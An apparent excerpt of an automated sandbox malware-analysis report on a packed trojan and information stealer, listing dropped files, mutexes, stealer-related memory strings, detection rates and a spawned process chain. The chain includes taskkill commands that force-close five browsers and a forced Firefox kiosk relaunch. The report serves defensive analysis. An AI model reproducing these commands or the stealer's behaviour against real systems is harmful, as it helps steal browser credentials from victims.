Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5D3EC0	6_2_6C5D3EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C707F20	6_2_6C707F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5A5F30	6_2_6C5A5F30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5E5F20	6_2_6C5E5F20
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C65BFF0	6_2_6C65BFF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6CDFC0	6_2_6C6CDFC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C733FC0	6_2_6C733FC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5D1F90	6_2_6C5D1F90
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C60D810	6_2_6C60D810
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C70B8F0	6_2_6C70B8F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68F8F0	6_2_6C68F8F0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5BD8E0	6_2_6C5BD8E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5E38E0	6_2_6C5E38E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C62F960	6_2_6C62F960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C66D960	6_2_6C66D960
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C665920	6_2_6C665920

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C5D3620 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C5D9B10 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C6E9F30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: String function: 6C60C5E0 appears 35 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.998114224137931
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: Section: ZLIB complexity 0.998446014986376
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: skotes.exe.4.dr	Static PE information: Section: ZLIB complexity 0.998446014986376
Source: skotes.exe.4.dr	Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: random[1].exe.7.dr	Static PE information: Section: ZLIB complexity 0.998114224137931
Source: e192e43b61.exe.7.dr	Static PE information: Section: ZLIB complexity 0.998114224137931
Source: random[1].exe0.7.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: b0b9f39429.exe.7.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: Section: ZLIB complexity 0.998446014986376
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: Section: ujtayirb ZLIB complexity 0.994414299962006
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@51/42@7/7

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C610300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

6_2_6C610300

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OEHXUQRB.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:708:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.1733012130.0000000005E47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733332516.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2277724392.000000001D6E4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2607664389.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2740168435.0000000005AAE000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2809108791.0000000005ACA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	Virustotal: Detection: 42%
Source: file.exe	ReversingLabs: Detection: 31%

Source: 6IF65DE3AL7UEH5E4W09DIZ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe "C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe"
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe "C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe "C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e60347-4193-4a06-98d1-e931f84d08bb} 6604 "\\.\pipe\gecko-crash-server-pipe.6604" 1e752c6cf10 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe "C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe "C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe "C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe "C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe "C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e60347-4193-4a06-98d1-e931f84d08bb} 6604 "\\.\pipe\gecko-crash-server-pipe.6604" 1e752c6cf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: uxtheme.dll	Jump to behavior
